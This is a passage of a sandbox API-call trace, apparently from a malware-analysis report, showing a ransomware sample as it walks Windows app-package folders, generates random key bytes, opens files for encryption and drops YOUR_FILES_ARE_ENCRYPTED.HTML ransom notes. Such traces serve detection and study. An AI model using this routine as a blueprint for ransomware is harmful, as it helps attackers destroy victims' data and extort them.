param_2="%02X" | out: param_1="3D") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="32") returned 2 [0115.893] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="F6") returned 2 [0115.893] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="C8") returned 2 [0115.893] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="ED") returned 2 [0115.893] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="3E") returned 2 [0115.893] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="41") returned 2 [0115.893] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="2D") returned 2 [0115.894] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0115.894] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.894] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0115.894] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28fa698, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x28fa698, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28fa698, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0115.894] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.894] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 172 [0115.894] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.894] lstrlenW (lpString=".LOG1") returned 5 [0115.894] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.894] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28fa698, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x28fa698, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28fa698, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0115.894] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.895] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 172 [0115.895] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.895] lstrlenW (lpString=".LOG2") returned 5 [0115.895] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.895] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28fa698, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x28fa698, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28fa698, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x62ec40, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0115.895] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0115.895] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 177 [0115.895] GetProcessHeap () returned 0x600000 [0115.895] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\microsoft.getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.896] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.897] CloseHandle (hObject=0x320) returned 1 [0115.897] GetProcessHeap () returned 0x600000 [0115.897] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.897] GetProcessHeap () returned 0x600000 [0115.898] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.898] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x262593e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262593e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x28fa698, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0115.898] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.898] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 161 [0115.898] GetProcessHeap () returned 0x600000 [0115.898] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Microsoft.Getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\microsoft.getstarted_2.3.7.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.899] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.910] CloseHandle (hObject=0x324) returned 1 [0115.911] GetProcessHeap () returned 0x600000 [0115.911] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.911] GetProcessHeap () returned 0x600000 [0115.911] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.912] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0115.912] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.912] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\RoamingState") returned 96 [0115.912] GetProcessHeap () returned 0x600000 [0115.912] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.913] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\RoamingState" [0115.913] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\RoamingState\\*" [0115.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.913] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0115.913] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x176515d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x176515d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x176515d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0115.913] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.913] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0115.913] GetProcessHeap () returned 0x600000 [0115.913] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.915] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.919] CloseHandle (hObject=0x324) returned 1 [0115.919] GetProcessHeap () returned 0x600000 [0115.919] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.919] GetProcessHeap () returned 0x600000 [0115.919] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.920] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1823c56, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0115.920] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.920] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings") returned 92 [0115.920] GetProcessHeap () returned 0x600000 [0115.920] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.921] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings" [0115.921] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\*" [0115.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1823c56, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.921] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1823c56, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0115.922] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1849e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0115.922] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.922] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 105 [0115.922] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.922] lstrlenW (lpString=".lock") returned 5 [0115.922] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.922] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0115.922] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.922] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\settings.dat") returned 105 [0115.922] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.922] lstrlenW (lpString=".dat") returned 4 [0115.922] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.922] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0115.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0115.923] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0115.923] GetProcessHeap () returned 0x600000 [0115.923] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0115.926] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="B2") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="CE") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="60") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="9F") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="6E") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="54") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="8F") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="9A") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="B4") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="EE") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="F7") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="2C") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="4D") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="15") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="D7") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="3B") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="09") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="FF") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="A6") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="1B") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="D8") returned 2 [0115.927] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="40") returned 2 [0115.927] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="42") returned 2 [0115.927] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="1F") returned 2 [0115.927] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="4C") returned 2 [0115.927] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="3D") returned 2 [0115.927] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="60") returned 2 [0115.927] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="AC") returned 2 [0115.927] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="FD") returned 2 [0115.927] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="1A") returned 2 [0115.928] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="94") returned 2 [0115.928] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="39") returned 2 [0115.928] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\settings.dat" [0115.928] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.928] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0115.929] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1849e3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1849e3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ece0, dwReserved1=0x62ec38, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0115.931] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.934] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0115.934] GetProcessHeap () returned 0x600000 [0115.934] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.935] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Getstarted_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.getstarted_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.937] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.938] CloseHandle (hObject=0x32c) returned 1 [0115.938] GetProcessHeap () returned 0x600000 [0115.938] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.938] GetProcessHeap () returned 0x600000 [0115.938] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.940] FindNextFileW 